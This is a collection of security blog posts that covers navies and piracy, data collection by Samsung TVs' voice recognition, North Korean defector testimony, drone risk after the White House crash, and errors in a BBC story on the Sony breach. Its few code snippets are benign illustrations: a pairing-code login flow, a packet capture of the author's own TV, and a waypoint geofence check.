After his talk the presenter backed away from defending the facts behind his conclusions. He said he had just read navy history lightly and was throwing out ideas for a keynote, so I let it drop as he asked. Shame, really, because I had been tossing out thoughts on this topic for a while and it seems like a good foundation for debate. Another point I would love to discuss some day in terms of cybersecurity is why so many navy sailors converted to being pirates (hint: more sailors died transporting slaves than slaves died en route).

My own talks on piracy and letters of marque were in London, Oct 2012, San Francisco, Feb 2013 and also Mexico City, Mar 2013. They didn’t generate much response so I did not push the topic further. Perhaps I should bring them back again or submit updates, given how some have been talking about national concerns with cyber to protect commerce.

If I did present on this topic again, I might start with an official record of discussion with President Nixon, February 8, 1974, 2:37–3:35 p.m. It makes me wonder if the idea “eventually navies take over” actually is a form of political persuasion, a politicized campaign, rather than any sort of prediction or careful reflection on history:

Dr. Gray: I am an old Army man. But the issue is not whether we have a Navy as good as the Soviet Union’s, but whether we have a Navy which can protect commerce of the world. This is our #1 strategic problem.

Adm. Anderson: Suppose someone put pressure on Japan. We couldn’t protect our lines to Japan or the U.S.-Japan shipping lanes.

The questions I should have asked the keynote speaker were not about historic accuracy or even the role of navies. Instead perhaps I should have gone straight to “do you believe in authoritarianism (e.g. fascism) as a valid solution to market risks”?

Posted in History, Sailing, Security.


Samsung TV: Would You Trust It?

Samsung is in a bit of a pickle. They want people to know that the “voice recognition feature is activated using the TV’s remote control”. But let’s face it: their disclaimer/warning that comes with the TV gave away the real story:

You can control your SmartTV, and use many of its features, with voice commands.

If you enable Voice Recognition, you can interact with your Smart TV using your voice. To provide you the Voice Recognition feature, some voice commands may be transmitted (along with information about your device, including device identifiers) to a third-party service that converts speech to text or to the extent necessary to provide the Voice Recognition features to you. In addition, Samsung may collect and your device may capture voice commands and associated texts so that we can provide you with Voice Recognition features and evaluate and improve the features. Please be aware that if your spoken words include personal or other sensitive information, that information will be among the data captured and transmitted to a third party through your use of Voice Recognition.

Nice attempt at raising awareness. Kudos for that. The first thing that jumps out at me is how vague the terms are. Second, I noticed the controls appear to be weak, or at least buried in some menu somewhere (“activated using your remote!” is basically meaningless). Third, Samsung clearly tries to dissuade you from disabling voice monitoring.

If you do not enable Voice Recognition, you will not be able to use interactive voice recognition features, although you may be able to control your TV using certain predefined voice commands. While Samsung will not collect your spoken word, Samsung may still collect associated texts and other usage data so that we can evaluate the performance of the feature and improve it.

You may disable Voice Recognition data collection at any time by visiting the “settings” menu. However, this may prevent you from using all of the Voice Recognition features.

So that’s a warning that your data can go somewhere, who knows where. On the other hand if you disable data collection you may be prevented from using all the features. Don’t you want all the features? Awful choice we have to make.

Samsung product management should be held accountable for a triad of failures. Really, a TV product manager should be in serious hot water. It is embarrassing in 2015 for a consumer product company of any size to make this large a mistake. We faced these issues at Yahoo product security ten years ago and I am seriously disappointed in Samsung. That also is why I find growing public outrage encouraging.

Yahoo! 2006 “Connected Life” Internet TV device

At Yahoo we had a large team focused on user privacy and safety. Research on Internet TV found novelty in a shared device with individual user privacy needs. On the mobile phone product managers could tell me “there is always only one user” and we would debate multi-user protections. But on the TV, oh the TV was different: multi-user risks were obvious to product managers and it was easy for them to take notice. The outrage against Samsung was easily predictable and avoidable.

Take for example typing your password on a big screen menu in front of a room. Everyone can see. The solution I created a decade ago was based on a simple concept: move user information to a disposable/agile security model instead of an expensive/static one. We developed a throwaway token option to register an account on the big screen instead of asking for a sensitive password.

Type your password into a private system, such as a laptop or phone, and the system sends you a number. You enter that number into the TV. Doesn’t matter if anyone sees the number. That was 2006 as we worked with TV manufacturers on how to keep data in public rooms on shared devices private. Yahoo dominated the Internet share of accounts (2 billion users) around this time so nearly every manufacturer would come through our process. Thus we could try to consult with them before bad code or devices were released.
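
The shape of that flow, reduced to a toy shell sketch (all names here are hypothetical; the real 2006 system did this server-side):

  # on the trusted private device, after a normal password login,
  # mint a short-lived throwaway pairing code tied to the account
  code=$(shuf -i 100000-999999 -n 1)
  echo "Enter this code on the TV: $code"
  # the TV submits the code to the service, which swaps it for a
  # device-scoped session token and immediately expires the code;
  # the password never touches the shared screen

Anyone shoulder-surfing the living room sees only a number that is worthless seconds later.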

Samsung should have thought this through better on their own by now. For example commands used for the TV could require a keyword to “markup” listening, such as “Hello Samsung” and “Goodbye”. That phrase is basically never going to come up in casual conversation. Phones already do this. Remember CB radio? Lots of good verbal markup ideas there, and who wouldn’t enjoy talking to their TV like a trucker?

Also important is a visual indication that the TV is listening, such as an annoyingly bright LED that can’t be missed. And third, a physical disable switch with tactile and visual feedback would be nice; like switching off an old Marshall amplifier. Perhaps a switch on the remote or a button that lights up like a big red “recording” indicator. And this doesn’t even get into fun answers to how the data is protected in memory, storage and over the wire.

Unfortunately Samsung just gave themselves a black eye instead. I would not buy another product from them until I have hard evidence their product management runs through a legitimate security team/review process. In fact I am now disposing of the Samsung device I did own and there’s a very high chance of migrating to another manufacturer.

Just for some comparison, notice how the camera and facial recognition were described:

Vague:

Your SmartTV is equipped with a camera that enables certain advanced features, including the ability to control and interact with your TV with gestures and to use facial recognition technology to authenticate your Samsung Account on your TV. The camera can be covered and disabled at any time, but be aware that these advanced services will not be available if the camera is disabled.

Specific:

The camera situated on the SmartTV also enables you to authenticate your Samsung Account or to log into certain services using facial recognition technology. You can use facial recognition instead of, or as a supplementary security measure in addition to, manually inputting your password. Once you complete the steps required to set up facial recognition, an image of your face is stored locally on your TV; it is not transmitted to Samsung. If you cancel your Samsung Account or no longer desire to use facial recognition, please visit the applicable settings menu to delete the stored image. While your image will be stored locally, Samsung may take note of the fact that you have set up the feature and collect information about when and how the feature is used so that we can evaluate the performance of this feature and improve it.


Updated Feb 23: David Lodge has dumped the network traffic and proved that it is indeed capturing and sending unencrypted text to Samsung. He writes:

What we see here is not SSL encrypted data. It’s not even HTTP data, it’s a mix of XML and some custom binary data packet.

The sneaky swines; they’re using 443/tcp to tunnel data over; most likely because a lot of standard firewall configurations allow 80 and 443 out of the network. I don’t understand why they don’t encapsulate it in HTTP(S) though.

Anyway, what we can see is it sending a load of information over the wire about the TV, I can see its MAC address and the version of the OS in use. After the word buffer_id is a load of binary data, which looks audio-ish, although I haven’t delved further into it yet.

Then, right at the bottom, we have the results.

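If you want to reproduce the capture on your own set, one approach (assuming the TV’s traffic passes through a Linux box you control, and substituting the TV’s actual address for the placeholder) is a plain tcpdump:

  sudo tcpdump -i eth0 -w tv.pcap host <tv-ip> and port 443

Opening tv.pcap in Wireshark should show the same mix of XML and binary data Lodge describes, carried over port 443 without SSL.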

Posted in Security.


The DPRK Humanitarian Crisis

In private circles I was agitating for a while on the humanitarian crisis in North Korea. Although I have collected a bit of data and insights over the years it just hasn’t seemed like the sort of thing people were interested in or asking about. Not exactly good conversation material.

Then earlier this year I was at Bletchley Park reading about Alan Turing. A quote of his prompted me to post my thoughts here on North Korea’s humanitarian crisis. Turing said basically (paraphrasing):

I helped my country defeat the Nazis, who used chemical castration to torture people including gays and Jews. In 1952 my country wants to give me the same treatment as a form of “managing” gays.

Turing’s life story was not well known until long after he died. And as we learn more about his tragic end it turns out despite exceptional service to his country he was horribly misunderstood and mistreated. He fought to preserve dignity against spurious charges; his social life and personal preferences caused him much trouble with British authorities. Turing was under constant surveillance and driven into horrible despair. After suffering effects of chemical castration, required by a court order, he committed suicide.

I’ll write more about the Turing incident in another post. Suffice it to say here that in the 1950s there was an intense fear-mongering climate against “gay communists” in England. Thousands of men were sent to prison or chemically castrated without any reasonable cause.

Between 1945 and 1955 the number of annual prosecutions for homosexual behaviour rose from 800 to 2,500, of whom 1,000 received custodial sentences. Wolfenden found that in 1955 30% of those prosecuted were imprisoned.

The English inflicted horrible treatment, even torture, on gay men to what end exactly? Turing was baffled at being arrested for “gross indecency”, not least of all because just ten years earlier he had helped his country fight to protect people against such treatment. A gruesome early death was predictable for those monitored and questioned by police, even without charges.

The reform activist Antony Grey quotes the case of police enquiries in Evesham in 1956, which were followed by one man gassing himself, one throwing himself under a train, leaving widow and children, and an 81 year old dying of a stroke before sentence could be passed.

Why do I mention this? Think about the heavily politicized reports written by Mandiant or Crowdstrike. We see China, Russia and Iran accused of terrible things as if we should only look elsewhere for harm. If you are working for one of these companies today and do not think it possible that the things you condemn abroad could happen at home, this post is for you. I recommend you consider how Turing felt betrayed by the country he helped defend.

Given Turing’s suffering can we think more universally, more forward? Wouldn’t that serve to improve moral high-ground and justifications for our actions?

Americans looking at North Korea often say they are shocked and saddened by the treatment of prisoners there. I’ll give a quick example. Years ago in Palo Alto, California a colleague recommended a book he had just finished. He said it proved without a doubt how horribly communism fails and causes starvation, unlike our capitalism that brings joy and abundance. The obvious touch of naive free-market fervor was bleeding through so I questioned whether we should trust single-source defection stories. I asked how we might verify such data when access was closed.

I ran straight into the shock and disgust of someone as if I were excusing torture, or justifying famine. How dare I question accusations about communism, the root of evil? How dare I doubt the testimony of an escapee who suffered so much to bring us truth about immorality behind closed doors? Clearly I did not understand free market superiority, which this book was really about. Our good must triumph over their evil. Did I not see the obviously worst type of government in the world? The conversation clouded quickly with him reiterating confidence in market theory and me causing grief by asking if that survivor story was sound or complete on its own.

More recent news fortunately has brought a more balanced story than the material we discussed back then. It has become easier to discuss humanitarian crisis at a logical level since more data is available with more opportunity for analysis. Even so, the Associated Press points out that despite thousands of testimonials we still have an incomplete picture from North Korea and no hard estimates.

The main source of information about the prison camps and the conditions inside is the nearly 25,000 defectors living in South Korea, the majority of whom arrived over the last five years. Researchers admit their picture is incomplete at best, and there is reason for some caution when assessing defector accounts.

I noticed the core of the problem when watching Camp 14. This is a movie that uses first-person testimony from a camp survivor to give insights into conditions of North Korea. Testimony is presented as proof of one thing: the most awful death camps imaginable. Camp workers are also interviewed to back up the protagonist story. However a cautious observer would also notice the survivor’s view has notable gaps and questionable basis.

The survivor, who was born in the prison, says he became enraged with jealousy when he discovered his mother helping his older brother. He turned in his own mother to camp authorities. That is horrible in and of itself but he goes on to say he thought he could negotiate better treatment for himself by undermining his family. Later he wonders in front of the camera whether as a young boy he might have mis-heard or mis-understood his mother; wonders if he sent his own mother to be executed in front of him for no reason other than to improve his own situation.

The survivor also says one day much later he started talking to a prisoner who came from the outside, a place that sounded like a better world. The survivor plots an escape with this prisoner. The prisoner from the outside then is electrocuted upon touching the perimeter fence; the survivor climbs over the prisoner’s body, using it as insulation to free himself.

These are just a couple of examples (the role of his father is another; the old man who rehabilitated him is another) that jumped out at me as informational in a different way than perhaps was intended. This is a survivor who describes manipulation for his own gain at the expense of others, while others in his story seem to be helping each other and working towards overall gains.

I’ve watched a lot of survivor story videos and met in person with prison camp survivors. Camp 14 did not in any way sound like trustworthy testimony. I gave it the benefit of the doubt while wondering whether we would hear stories of the others, those who were not just opportunists. My concern was that this survivor comes across as a trickster who knows how to wriggle toward self-benefit regardless of harm or disrespect to those around him. Would we really treat this story as our best evidence?

The answer came when major elements of his story appeared to have been formally disputed. He quickly said others were the ones making up their stories; he then stepped away from the light.

CNN has not been able to reach Shin, who noted in a Facebook post apologizing for the inaccuracies in his story that “these will be my final words and this will likely be my final post.”

My concern is that outsiders looking for evidence of evil in North Korea will wave hands over facts and try to claim exceptional circumstances. It may be exceptional, yet without caution someone could quickly make false assumptions about the cause of suffering and act on false pretenses, actually increasing the problem or causing worse outcomes. The complicated nature of the problem deserves more scrutiny than easy vilification based on stale reports from those in a position to gain the most.

One example of how this plays out was seen in a New York Times story about North Korean soldiers attacking Chinese along border towns. A reporter suggested soldiers today are desperate for food because of a famine 20 years ago. The story simply did not add up as told. Everything in it suggested to me that the attackers wanted status items, such as cash and technology. Certain types of food also may carry status, but the story did not really seem to be about food to relieve famine, to compensate for communist market failure.

Thinking back to Turing, how do we develop a logical framework, let alone a universal one, to frame the ethical issues around intervention against North Korea? Are we starting with the right assumptions as well as keeping an open mind on solutions?

While we can dig for details to shame North Korea for its prison culture, we also must consider that the International Centre for Prison Studies ranks the United States second only to the Seychelles in per-capita incarceration rate (North Korea is not listed). According to 2012 data almost 1% of all US citizens are in prison. Americans should think about what quantitative analysis of prisons shows, such as here:

incarceration_rates

There also are awful qualitative accounts from inside the prisons, such as the sickening Miami testimony by a former worker about killing prisoners through torture, and prisoner convictions turning out to have zero integrity.

Human Rights Watch asked “How Different are US Prisons?” given that federal judges have called them a “culture of sadistic and malicious violence”. Someone even wrote a post claiming half of the world’s worst prisons are in the US (again, North Korea is not listed).

And new studies tell us American county jails are run as debtors’ prisons, full of people guilty of very minor crimes yet kept behind bars by court-created debt.

Those issues are not lost on me as I read the UN Report of the Commission of Inquiry on Human Rights in the Democratic People’s Republic of Korea. Hundreds of pages give detailed documentation of widespread humanitarian suffering.

Maintaining a humanitarian approach, a universal theory of justice, seems like a good way to keep ourselves grounded as we wade into understanding crisis. To avoid the Turing disaster we must keep in mind where we are coming from as well as where we want others to go.

Take for example new evidence from a system where police arrest people for minor infractions and hold them in fear and against their will, in poor conditions without representation. I’ll let you guess where such a system exists right now:

They are kept in overcrowded cells; they are denied toothbrushes, toothpaste, and soap; they are subjected to the constant stench of excrement and refuse in their congested cells; they are surrounded by walls smeared with mucus and blood; they are kept in the same clothes for days and weeks without access to laundry or clean underwear; they step on top of other inmates, whose bodies cover nearly the entire uncleaned cell floor, in order to access a single shared toilet that the city does not clean; they develop untreated illnesses and infections in open wounds that spread to other inmates; they endure days and weeks without being allowed to use the moldy shower; their filthy bodies huddle in cold temperatures with a single thin blanket even as they beg guards for warm blankets; they are not given adequate hygiene products for menstruation; they are routinely denied vital medical care and prescription medication, even when their families beg to be allowed to bring medication to the jail; they are provided food so insufficient and lacking in nutrition that inmates lose significant amounts of weight; they suffer from dehydration out of fear of drinking foul-smelling water that comes from an apparatus on top of the toilet; and they must listen to the screams of other inmates languishing from unattended medical issues as they sit in their cells without access to books, legal materials, television, or natural light. Perhaps worst of all, they do not know when they will be allowed to leave.

And in case that example is too fresh, too recent with too little known, here is a well-researched look at events sixty years ago:

…our research confirms that many victims of terror lynchings were murdered without being accused of any crime; they were killed for minor social transgressions or for demanding basic rights and fair treatment.
[…]
…in all of the subject states, we observed that there is an astonishing absence of any effort to acknowledge, discuss, or address lynching. Many of the communities where lynchings took place have gone to great lengths to erect markers and monuments that memorialize the Civil War, the Confederacy, and historical events during which local power was violently reclaimed by white Southerners. These communities celebrate and honor the architects of racial subordination and political leaders known for their belief in white supremacy. There are very few monuments or memorials that address the history and legacy of lynching in particular or the struggle for racial equality more generally. Most communities do not actively or visibly recognize how their race relations were shaped by terror lynching.
[…]
That the death penalty’s roots are sunk deep in the legacy of lynching is evidenced by the fact that public executions to mollify the mob continued after the practice was legally banned.

The cultural relativity issues in our conflict with North Korea are something I really haven’t seen anyone talking about anywhere, although they seem like something that needs attention. Maybe I just am not in the right circles.

Perhaps I can put it in terms of a slightly less serious topic.

I often see people mocking North Korea for a lack of power and for living in the dark. Meanwhile I never see people connect that lack of power to a June 1952 American bombing campaign that knocked out 90% of North Korea’s power infrastructure. This is not to say bomb attacks from sixty years ago and modern fears of dependency on infrastructure are directly related. It is far more complex.

However, it stands to reason that a country in fear of infrastructure attacks will encourage resiliency, and its culture will shift accordingly. A selfish dictator may also encourage resiliency to hoard power, greatly complicating analysis. Still, I think Americans may over-estimate the future of past models, with their inefficiencies and dependency on centralized power. North Korea, or Cuba for that matter, could end up being a global leader as it figures out new decentralized and more sustainable infrastructure systems.

Sixty years ago the Las Vegas strip’s glare and consumption would have been a marvel of technology, a show of great power. Today it seems more like an extravagant waste, an annoyance preventing us from studying the far more beautiful night sky full of stars that need no power.

Does this future sound too Amish? Or are you one of the people ranking the night sky photos so highly that they reach most popular status on all the social sites? Here’s a typical 98.4% “pulse” photo on 500px:

nightlake-hipydeus
Night at the Lake by hipydeus

Imagine what Google Glass enhanced for night vision would be like as a new model. Imagine the things we would see if we reversed from street lights everywhere, shifting away from cables to power plants, and went towards a more sustainable and resilient goal of localized power and night vision. Imagine driving without the distraction of headlights at night, with an ability to see anyway, as military drivers around the world have been trained to do…

I’ll leave it at that for now. So there you have a few thoughts on humanitarian crisis, not entirely complete, spurred by a comment by Turing. As I said earlier, if you are working at Mandiant or Crowdstrike, please think carefully about his story. Thanks for reading.

Posted in Security.


A Remote Threat: The White House Drone Incident

Have you heard the story about a drone that crashed into the White House yard?

Wired has done a follow-up story, drawing from a conference held to discuss drone risks.

The conference was open to civilians, but explicitly closed to the press. One attendee described it as an eye-opener.

Laughably, Wired seems to quote just one anonymous attendee as payback for the lack of access to the event. Who was this attendee? Why was it an eye-opener?

In my conference talks for the past few years I have explicitly mentioned attacks on auto-auto (self-driving cars) based on our fiddling with drones. Perhaps we are not getting much attention, despite doing our best to open eyes. Instead of the really scary stuff, the Wired perspective looks only at a very limited and tired example.

But the most striking visual aid was on an exhibit table outside the auditorium, where a buffet of low-cost drones had been converted into simulated flying bombs. One quadcopter, strapped to 3 pounds of inert explosive, was a DJI Phantom 2, a newer version of the very drone that would land at the White House the next week.

Ok, surely that’s not the most striking visual aid. I would be happy to give any journalist multiple reasons why a drone with 3 pounds of explosive does not present the most difficult defensive situation. In fact, on the scale of things I would want to build defenses against, a bomb drone seems very easily within reach. There are far, far more troubling ones, which is why I have been giving presentations on the risks and what defenders could do about them (Blackhat, CONFidence).

We also have tweeted about taking over the Skyjack drone by manipulating its attack script flaw, essentially a mistake in radio logic. A drone on autopilot using mapped GPS waypoints would be straightforward to defeat, which we also have had some fun discussions about, at least in terms of ships (flying in water, get it?). And then there is Lidar jamming…

Anyway, back in April of 2014 I had tweeted about DJI drone controls and no-waypoint zones. The drone company was expressing a clear global need to steer clear of airports. I thought I should call attention to our 2014 research and this detail as soon as I saw the White House news, so I replied to some tweets.

dtweet6

Nine retweets!? Either I was having a good day or the White House raises people’s attention level. Maybe we can blow off all our past talking about this because someone just flew a drone into the wrong yard. It’s a whole new ballgame of awareness. While the White House drone incident could cause a backlash against drone manufacturers for lack of zone controls, the incident also brings a much-needed inflection point at the highest and broadest levels, which is long overdue.
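
To make the idea of “zone controls” concrete, here is a minimal sketch of waypoint geofencing. This is my own illustration, not DJI’s actual firmware logic (which is not public here): the coordinates and radii below are hypothetical, and the haversine great-circle formula simply stands in for whatever a vendor really uses.

    import math

    def haversine_km(lat1, lon1, lat2, lon2):
        # Great-circle distance between two points, in kilometers
        r = 6371.0  # mean Earth radius, km
        dlat = math.radians(lat2 - lat1)
        dlon = math.radians(lon2 - lon1)
        a = (math.sin(dlat / 2) ** 2
             + math.cos(math.radians(lat1)) * math.cos(math.radians(lat2))
             * math.sin(dlon / 2) ** 2)
        return 2 * r * math.asin(math.sqrt(a))

    # Hypothetical no-fly centers: (latitude, longitude, radius in km)
    NO_FLY = [
        (38.8977, -77.0365, 25.0),   # e.g. restricted airspace around Washington, DC
        (37.6213, -122.3790, 8.0),   # e.g. an airport exclusion radius
    ]

    def waypoint_allowed(lat, lon):
        # Reject any waypoint that falls inside a no-fly radius
        return all(haversine_km(lat, lon, nlat, nlon) > radius
                   for nlat, nlon, radius in NO_FLY)

    print(waypoint_allowed(38.8977, -77.0365))   # False: inside the DC zone
    print(waypoint_allowed(36.1147, -115.1728))  # True for this toy list

The point of the sketch is that a firmware-side check like this is cheap to implement; whether a manufacturer enforces it, and whether a pilot can strip it out, is the real policy question.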

Our culture tends to let the market harm the average person on the theory that they can figure it out for themselves. Once a top dog, a celebrity with everything, is harmed or threatened, things get real. It is as if we say “if they can’t defend themselves, no one can,” and so the regulatory wheels start to spin.

An incident with zero impact that can raise awareness sounds great to me. As I explained to an FCC Commissioner last year, American regulation is driven by celebrity events. This one was pretty close and may get us some good discussion points. That is why I see this incident finally bringing together at least three profiles of drone enthusiast. Fresh, new people will be stepping into the ring to tinker and offer innovative solutions; old military and scientific establishment folks (albeit with some VIP nonsense and closed-door snafus) will come out of the woodwork to ask for a place in the market; and of course those who have been fiddling away for a while without much notice will take a deep breath, write a blog post and wonder who will read it this time.

Three drone enthusiast profiles

Last year I sauntered into a night-time drone meetup in San Francisco. It was sponsored by a high-powered east-coast pseudo-governance organization. And when I say drone meetup, I am not just talking about the lobbyist drone in fancy clothes who talked about bringing “community” closer to the defense industry’s “shared objectives” (“you are getting very sleepy”). I am talking about a room stuffed with people interested in pushing technology boundaries, mostly in the air. I would like to share several observations about that meetup. Roughly speaking, I found the audience fit into these interest levels:

  • Profile 1: The hobbyists seemed easily annoyed by thinking about risks. This is typical in technology meetups that bring developers together. Some people look at the clouds above the picnic, some look at the ants. The new drone meetups almost always are filled with cloud watchers.
    Others would ask me “what’s your rig” or “what do you pilot” to talk shop. I would reply “Sorry, not a pilot, I study using ground control to remove drones from the air”. This went over like a lead balloon. You could sense the deflation in mood.
    When I was asked “why would anyone want to do that” my response was “I have no idea. There are so many possible reasons.” My area of study is not focused on why. I want to know how. So I told people “When somebody decides why a drone needs to be stopped, I would like us to avoid any panic about how.”
    Although the hobbyists had some amazing ideas about drones changing the world for the better, I was doing my duty to ask “why” and “is that safe” at strategic points in the conversation.
  • Profile 2: The professionals were swapping stories about successes and failures in the ancient past. This crowd was jaded already. As per usual, those with field experience had a veritable gold-mine of lessons not widely shared. A favorite of mine was the guy who built private gas-leak drones and made them “too accurate”. He forced the power company (PG&E) to admit their existing sensors (mostly manual, staff in vehicles) were dangerously outdated. Better sensor technology was meant to be a sales strategy for this drone professional, yet the quality gap he opened between old and new was so large that PG&E got angry and fought back instead of buying in.
    Another great story was of a drone that had flown throughout mines and laser-mapped them. Software stitched the photos together with maps, using a large cloud compute cluster, and inexpensively created a 3D world of a hazardous cave to be enhanced with environmental details. New business models were being explored around providing geology maps to FPS gaming companies, or to architects planning new construction. Want to see how your new underground restaurant looks at 5:30PM as the sun sets, or in a morning rain-storm? Click, click: now you can walk through, just as a drone already has.
    Another was pure surveillance, although the story was told as “tourism”. Go visit a monument, take a few photos. Nice. Now pull out your pocket drone, take a few thousand pictures and have a perfect 3D model you can replicate later. Throw up a drone on a specific route to 3D-map anything. Statues, machines, buildings…it comes back with data you download, process and can use to build or model perfectly anything the drone “sees” on its little vacation. Since the processing story was last year, I also have to point out that this year drones started processing all the data in real time as they fly.
  • Profile 3: The lobbyist was annoyed about risks like the hobbyists, although she blended in hard lessons from Profile 2. It was a bridging of the reality of risks with the promise of new sales.
    She was of the opinion that the US military was light-years ahead of hobbyists in drone building and flying. Been there, done that: they had forged a business model, and their engineers therefore should rule the technology leadership roost into the next business models. However, she came to SF to openly admit the military-industrial complex has become so used to handouts from government that it felt a bit worried about missing the boat on consumer markets.
    Someone recognized a strong Profile 2 (seasoned story-telling) had been missing from their lobbyist toolkit for the coming commercial boom. A flood of new talent was scooping up drone kits and toys, quickly threatening to dwarf the proprietary market cap. The lobbyist was talking about synergies and collaborations. Although let’s be honest, she is a lobbyist. She also was testing the water for an exit from big old federal government money into even bigger global commercial money. She just didn’t know yet whom she should focus her pleadings on most.

You could smell a three-way collision (at least, maybe more) brewing and bubbling, yet the groups still stood far apart at this meetup. Political stakes were increasing: money and ideas were starting to flow, old power brokers were worried about disruption, and seasoned vets were sprinkling around guidance on where to go with the technology and its new horizons. This is how things have evolved for many years; it just did not yet seem the time for collaboration.

Bringing Profiles Together

Going way, way back, I remember as a child when my grandfather handed me a drone he had built (mostly ruined, actually, but let’s just pretend he made it better). Having a grandfather who built drones did not seem all that special. Model trains, airplanes, boats…all that I figured to be the purview of old people fascinated with making big technology smaller so they could play with it. Kind of like the bonsai effect, I guess. Fast-forward to today and I realize he might have been a little exceptional. Groups everywhere are growing consistently larger and more committed to drones, albeit separate and distinct from each other, not part of everyday life.

As popularity increases, so does the question of how all the pieces and parties should work together better. Roombas aside, my theory is the future looks incredibly bright if people start working together on ethics and politics in the bigger picture, including risks. I wasn’t going to fall for the Profile 3 lobbyist pitch (who was?). However, I was excited by some of the groups and discussions.

Speaking of way back, in 2013 I found my long-time drone interests leading to tweets that were useful at work. I thought Twitter might help converge risk discussions into after-hours meetups, like talking about the forward-thinking people in Iowa demanding no-drone zones.

dtweet1

Clearly my humor did not win anyone’s attention. Not a single retweet or favorite. Crickets.

It also may just be that Twitter sucks as a platform and I have no followers. That’s probably why I’m back to blogging more again. Does anyone find tweets conducive to real conversation? The best Twitter seems to do for me is to shift conversation by allowing me to throw a fact in here or there, as if I sit quietly with my remote Twitter control, every so often dropping stones into the Twitter pond.

When a news story broke in 2013 I had to jump in and say “hey, cool Amazon hobbyist (new) story and I think you could be overlooking a FedEx lobbyist (old) story”.

dtweet2

I was poking around some loopholes too, wondering whether the drones over SF could have a get-out-of-jail card if we wanted to take them down.

dtweet3

Kudos to Sina and Jack for the conversation. My tweets were at least reaching two or three people at this point.

And as anti-drone laws were popping up I occasionally would mention my research in public. Alaska wanted a law to make sure hunters could not use drones for unfair advantage.

Such a rule seemed ironic, considering how guns have made killing a “sport” nearly anyone can “play”. A completely unbalanced and technology-laden air/ground/sea attack strategy on nature was common talk, at least when I was in Alaska. Anyway someone thought drones were taking an already automated sport of killing too far.

Illinois took the opposite approach to Alaska. Someone saw drones as potential interference with those out for a killing.

dtweet4

By April of 2014 I had built up a fair amount of detail on no-fly zones and strategies. We ran drones for testing, and anti-drone antenna prototypes were being discussed. I gave myself a challenge: get a talk accepted and then publish an anti-drone device, similar to anti-aircraft systems, for the hobbyist or average home user.

Here’s a good picture of where I was coming from on this idea. One of the top drone manufacturers was telling me their drones were absolutely not going to stray into no-fly zones. What if they did anyway? The ethics were easy in this space. A system to respond seemed clearly justified.

dtweet5

Haha. “No-way points,” get it? No? That’s ok, no one did. Not a single retweet or favorite for that map. It wasn’t completely lost on people, however. A little exposure meant I was called in for a short Loopcast episode, called Drone Hacking, which I suppose a few people might have heard. The counter says 162,000 plays so far, which seems impossible. Maybe drones are listening.

Anyway, my big plan to release our research at a conference was knocked down when the Infiltrate voting system denied us a spot. We were going to show how we immediately, and I mean immediately, found a way to take over the Skyjack drones. We wanted to talk about command and control, redirection and all kinds of fun stuff. Denied.

I resubmitted the same ideas to CanSecWest and again was denied. This pretty much shelved my excitement to explain more details and spend time in a formal public space. After all, my focus was more on the larger picture of big data and less on individual sensors. That’s why you’ll see drone information woven into my big data security talks and writings.

Although at last year’s EMCworld I put a guy on my staff dedicated to drones (running a bunch of cool tests and achieving real pilot skills), it still wasn’t brought out publicly as much as I would have liked. The timing still felt early, as if journalists were apprehensive and the various groups too separated to generate a nice broad, general-audience story. Our conference was explicitly open to the press, yet we were without any major celebrity-level disaster driving attendees. Maybe this year…

Posted in Security.


Beware the Sony Errorists

A BBC business story on the Sony breach flew across my screen today. Normally I would read through and be on my way. This story, however, was so riddled with strange and simple errors that I had to stop and wonder: who really reads this without pause? Perhaps we need a Snopes for theories about hackers.

A few examples

Government-backed attackers have far greater resources at their disposal than criminal hacker gangs…

False. Criminal hacker gangs can amass far greater resources more quickly than government-backed ones. Consider how criminal gangs operate relative to the restrictions of the “governed”. Government-backed groups have constraints on budget, accountability, jurisdiction…. I am reminded of the Secret Service agent who told me how he had to scrape and toil for months to bring together an international team with resources and approval. After finally getting approval, his group descended in a helicopter onto the helipad of a criminal property that was literally a massive gilded castle surrounded by exotic animals and vehicles. Government agencies were outclassed on almost every level, yet careful planning, teamwork and correct timing were on their side. The bust was successful despite strained resources across several countries.

Of course it is easy to find opposite examples. The government invests in the best equipment to prepare for some events, and clearly we see “defense” budgets swell. This is not the point. In many scenarios of emerging technology you find innovation and resources are handled better by criminal gangs, which lack the constraints of being governed; criminals can be as lavish or unreasonable as they decide. Have you noticed anyone lately talking about how Apple or Google have more money than Russia?

Government-backed hackers simply won’t give up…

False. This should be self-evident from the answer above. Limited resources and even regime change are some of the obvious reasons why government-backed anything will give up. In the context of North Korea, let alone the wider history of conflict, we only have to look at the definition of the armistice currently in place: “formal agreement of warring parties to stop fighting”.

Two government-backed sides in Korea formally “gave up” and signed an armistice agreement on July 27, 1953, at 10 a.m.

Perhaps some will not like this example because North Korea is notorious for nullifying the armistice as a negotiation tactic. Constant reminders of its intent for reunification make it seem as if it has refused to give up. I’d disagree, on the principle of what armistice means. Even so, let’s consider instead the U.S. role in Vietnam. On January 27, 1973 an “Ending the War and Restoring Peace in Viet-Nam” Agreement was signed by the U.S. and the others in conflict; by the end of 1973 the U.S. had unquestionably given up attacks, and three years later North and South were united.

I also am tempted to point to famous pirates (Ching Shih or Peter Easton) who “gave up” after a career of being sponsored by various states to attack others. They simply inked a deal with one sponsor to retire.

“What you need is a bulkhead approach like in a ship: if the hull gets breached you can close the bulkhead and limit the damage…

True with Serious Warning. To put it simply, bulkheads are a tool, not a complete solution. This is the exact mistake that led to the Titanic disaster. A series of bulkheads (with some fancy new-technology hand-waving of the time) was meant to keep the ship safe even when breached. This led people to refer to the design as “unsinkable”. So if the Titanic sank, how can bulkheads still be a thing to praise?

I covered this in my keynote presentation at the 2010 RSA Conference in London. Actually, I wasn’t expecting to be a keynote speaker and had packed my talk with details. Then I found myself on the main stage, speaking right after Richard Clarke, which made it awkward to fit in my usual pace of delivery. Anyway, here’s a key slide from the keynote.

B8-T_gPIQAEKjaw

The bulkheads gave a false sense of confidence, allowing a greater disaster to unfold for a combination of reasons. See how “wireless issues” and “warnings ignored” and “continuing to sail” and “open on top” start to add up? In other words, if you hit something and detect a leak, you tend to make an earlier and more complete assessment, one that considers the whole ship. If you instead think “we’ve got bulkheads, keep going,” a leak that could be repaired or slowed turns very abruptly into a terminal event, a sinking.

Clearly Sony had been breached in one of its bulkheads already. We saw the PlayStation breach in 2011 have dramatic and devastating impact. Sony kept sailing, probably with warnings ignored elsewhere, communications issues, and the belief that improvements in one bulkhead area of the company were sufficient. Another breach devastated them in 2013 and they continued along…so perhaps you can see how bulkheads are a tool that offers great promise yet requires particular management to be effective. Bulkheads all by themselves are not a “need”. Like a knife, or any other tool that makes defense easier, what people “need” is to learn how to use them properly: keep the pointy side in the right direction.
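
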